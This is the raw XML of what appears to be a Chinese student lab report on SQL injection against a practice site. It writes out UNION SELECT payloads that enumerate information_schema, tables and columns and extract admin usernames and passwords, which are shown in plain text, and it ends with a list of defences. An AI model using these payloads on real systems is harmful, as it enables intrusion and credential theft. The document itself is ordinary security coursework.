                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:kern w:val="2"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>表</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07FF733C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查询字段数量</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">?id=1=2 UNION SELECT 1,COUNT(*)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xss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'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=database()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DF48442" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center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"C:\\Users\\DELL\\AppData\\Local\\Temp\\QQ_1746877265064.png"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379EEC6B" wp14:editId="66E0A30E">
                  <wp:extent cx="5304155" cy="1741805"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="10795"/>
                  <wp:docPr id="10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5882D269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分别构造字段，查询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xss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表中的内容 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DCED87E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xss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' limit 0,1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73542526" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val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"C:\\Users\\DELL\\AppData\\Local\\Temp\\QQ_1746877316474.png"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52DC364A" wp14:editId="651B856E">
                  <wp:extent cx="5229860" cy="1837690"/>
                  <wp:effectExtent l="0" t="0" r="12700" b="6350"/>
                  <wp:docPr id="17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xss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' limit 1,1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E2218AA" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val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"C:\\Users\\DELL\\AppData\\Local\\Temp\\QQ_1746877336650.png"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6BDAB0EA" wp14:editId="3FC1E6B0">
                  <wp:extent cx="5269865" cy="1702435"/>
                  <wp:effectExtent l="0" t="0" r="3175" b="4445"/>
                  <wp:docPr id="5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70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7D192751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?id=1=2 union select 1,column_name from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information_schema.columns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table_schema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 xml:space="preserve">=database() and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table_name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='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xss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' limit 2,1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49064E7A" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="32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"C:\\Users\\DELL\\AppData\\Local\\Temp\\QQ_1746877355965.png"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0CBBB426" wp14:editId="17FAD0DA">
                  <wp:extent cx="5219065" cy="1179830"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="8890"/>
                  <wp:docPr id="18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065" cy="1179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11FD887F" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>管理员用户密码</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="466A3260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查询admin表的“username”字段的内容</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="731B563A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先查询username字段的内容数量</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AC7E89A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?id=1=2 UNION SELECT 1,COUNT(username) FROM admin</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62334DC2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"C:\\Users\\DELL\\AppData\\Local\\Temp\\QQ_1746877845136.png"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0C2AF3C5" wp14:editId="66D6855C">
                  <wp:extent cx="5394960" cy="1336040"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="6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133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653B0861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获得第一个用户名“admin”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24BD6993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?id=1=2 union select 1,username from admin limit 0,1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1187FB4E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"C:\\Users\\DELL\\AppData\\Local\\Temp\\QQ_1746877937697.png"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4EC70E7C" wp14:editId="458392BF">
                  <wp:extent cx="5344160" cy="1686560"/>
                  <wp:effectExtent l="0" t="0" r="5080" b="5080"/>
                  <wp:docPr id="20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28C09D14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获得第二个用户名“ppt领取微信”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0056D585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?id=1=2 union select 1,username from admin%20 limit 1,1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E4A0D36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"C:\\Users\\DELL\\AppData\\Local\\Temp\\QQ_1746878073219.png"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63A19236" wp14:editId="4872FFE0">
                  <wp:extent cx="5259070" cy="1582420"/>
                  <wp:effectExtent l="0" t="0" r="13970" b="2540"/>
                  <wp:docPr id="7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70" cy="158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19E98572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接着查询对应“password”字段的内容</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EB12A73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第一个密码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hellohack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="5DB654EB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?id=1=2 union select 1,password from admin%20 limit 0,1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36E49EBA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"C:\\Users\\DELL\\AppData\\Local\\Temp\\QQ_1746878214363.png"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7ECF218B" wp14:editId="6B46C449">
                  <wp:extent cx="5251450" cy="1750060"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="2540"/>
                  <wp:docPr id="12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0" cy="175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7BAA19DC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第二个密码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zkaqbanban</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="47AF1A63" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000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?id=1=2 union select 1,password from admin%20 limit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,1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23941F69" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000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/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:instrText xml:space="preserve">INCLUDEPICTURE \d "C:\\Users\\DELL\\AppData\\Local\\Temp\\QQ_1746878241026.png" \* MERGEFORMATINET </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体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114300" distR="114300" wp14:anchorId="14E508DA" wp14:editId="31914F10">
                  <wp:extent cx="5251450" cy="1707515"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="14605"/>
                  <wp:docPr id="9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0" cy="170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sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
          <w:p w14:paraId="0485B1A6" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="009E5DAC">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="17FCF11E" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="009E5DA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  <w:tr w:rsidR="009E5DAC" w14:paraId="339F7949" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1907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282DE11" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:num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实验过程中遇到的问题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eastAsia="黑体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>情况</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="518E2BB5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问题一：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="562FB06B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希望使用limit 0,4查询4条信息，然而每次只显示第一条</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E8FE7C3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解决：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71BB1D7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依次使用limit 1,1等等逐条查询</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32659720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问题二：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E637213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希望可以一次性查出所有用户名和密码，而不是使用limit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="481C3FBC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解决：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EC5DA7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采用</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>group_concat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>而不是</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>concat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="075A4EBD" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="009E5DA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2E8B5DF0" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="009E5DA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  <w:tr w:rsidR="009E5DAC" w14:paraId="0F88B743" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="5530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FCA8BC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六、实验结果及分析和（或）源程序调试过程</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02E1E527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（一）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>实验结果</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F20CD21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成功查询出如下信息（见第四部分）：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="186A3B2B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数据库名称</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E6C9260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数据库中的所有表的名称</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="663837BA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每个表中的字段数量以及字段名</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15BEC605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Cs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>管理员用户密码</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52BF736D" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="0000000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（二）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="黑体"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>对</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="黑体"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="黑体"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>注入攻击进行防范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15BBECA0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1. 使用参数化查询（预编译语句）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6571694D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核心措施：所有SQL语句均通过参数化接口（如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PreparedStatement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）执行，确保用户输入始终作为数据而非代码解析。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AE18B2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2. 严格的输入验证与过滤</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49A3813A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白名单机制：根据业务逻辑限制输入格式（如手机号仅数字、邮箱包含@）。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20A15ACD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3. 最小化数据库权限</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69251DF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权限分离：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FFAC4F3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应用连接数据库的账户仅授予SELECT、INSERT等必要权限。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="626277AA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禁用DROP、FILE、EXECUTE等高危操作权限。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7695A958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4. 安全的错误处理机制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="668E8715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禁用详细报错：生产环境关闭数据库错误回显，返回通用提示（如“请求失败”）。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04E1230C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日志记录：错误详情记录至服务器日志，而非暴露给用户。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C0A44D9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5. 使用ORM框架与安全库</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4100093B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ORM工具：如Hibernate、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SQLAlchemy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，通过对象映射减少手写SQL。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="396EF274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安全函数：利用框架的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escapeString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()或参数绑定功能。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="705813B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6. Web应用防火墙（WAF）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DF87F68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实时防护：部署WAF（如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ModSecurity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、Cloudflare）拦截恶意请求。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="413CC0C7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7. 定期安全审计与测试</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52BC5FD8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lastRenderedPageBreak/>
              <w:t>自动化扫描：使用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SQLMap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、OWASP ZAP等工具检测注入漏洞。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FB5BB3C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代码审查：重点检查SQL拼接逻辑，确保无动态拼接。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19DCB781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渗透测试：模拟攻击验证防护措施有效性。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43788703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8. 敏感数据加密存储</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01E04BF2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强哈希算法：密码使用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bcrypt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或Argon2加盐哈希，禁用MD5/SHA-1。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14CE2BD4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9. 禁用敏感元数据访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44741E3D" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>限制系统表权限：禁止普通用户读取</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>information_schema</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:cs="仿宋"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35B8D9CF" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="009E5DA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0AEB4FBF" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="009E5DAC"/>
    <w:p w14:paraId="005F1407" w14:textId="77777777" w:rsidR="009E5DAC" w:rsidRDefault="009E5DAC">
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="009E5DA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DFDB6" w14:textId="77777777" w:rsidR="00F23E3D" w:rsidRDefault="00F23E3D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="11BAF66D" w14:textId="77777777" w:rsidR="00F23E3D" w:rsidRDefault="00F23E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ABB455" w14:textId="77777777" w:rsidR="00F23E3D" w:rsidRDefault="00F23E3D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6D1B8EA0" w14:textId="77777777" w:rsidR="00F23E3D" w:rsidRDefault="00F23E3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31F7B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0D931F7B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E1090BF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0E1090BF"/>
    <w:lvl w:ilvl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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4321EE51"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4321EE51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831793284">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="484052375">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1816876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5DAC"/>
    <w:rsid w:val="006F7524"/>
    <w:rsid w:val="009066BB"/>
    <w:rsid w:val="009E5DAC"/>
    <w:rsid w:val="00F23E3D"/>
    <w:rsid w:val="025A529E"/>
    <w:rsid w:val="059656C7"/>
    <w:rsid w:val="0EF820C6"/>
    <w:rsid w:val="1F1F71FB"/>
    <w:rsid w:val="26D44D6F"/>
    <w:rsid w:val="2FDE0A0C"/>
    <w:rsid w:val="327D275F"/>
    <w:rsid w:val="33146B77"/>
    <w:rsid w:val="33721B98"/>
    <w:rsid w:val="34335B29"/>
    <w:rsid w:val="3E135D25"/>
    <w:rsid w:val="55986DE4"/>
    <w:rsid w:val="595B2526"/>
    <w:rsid w:val="72BF534B"/>
    <w:rsid w:val="74A23383"/>
    <w:rsid w:val="771C436B"/>
    <w:rsid w:val="7B7173FE"/>
    <w:rsid w:val="7DFD5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42A62B"/>
  <w15:docId w15:val="{7DEB4B3C-4B3B-46B2-86D7-AD684BD1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="宋体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5">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="9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styleId="a7">
    <w:name w:val="Hyperlink"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="0563C1"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a6">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma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ascii="Tahoma" w:hAnsi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u2lh35s.ia.aqlab.cn/?id=1&#8217;&#65292;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pu2lh35s.ia.aqlab.cn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1889</Words>
  <Characters>4213</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>234</Lines>
  <Paragraphs>190</Paragraphs>
  <ScaleCrop>false</ScaleCrop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cp:lastModifiedBy>Ayubass</cp:lastModifiedBy>
  <cp:revision>41</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2008-09-11T17:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-24T05:43:00Z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AEAD4B9F4D054EBB81BF20E729327B4C_13</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiMWI4MjFkMWRhNDE1NmFjYzVjZTk1MTc1YjE5NTdmOTgiLCJ1c2VySWQiOiI5NDc3MTI3NzIifQ==</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.21171</vt:lpwstr>
  </property>
</Properties>
</file>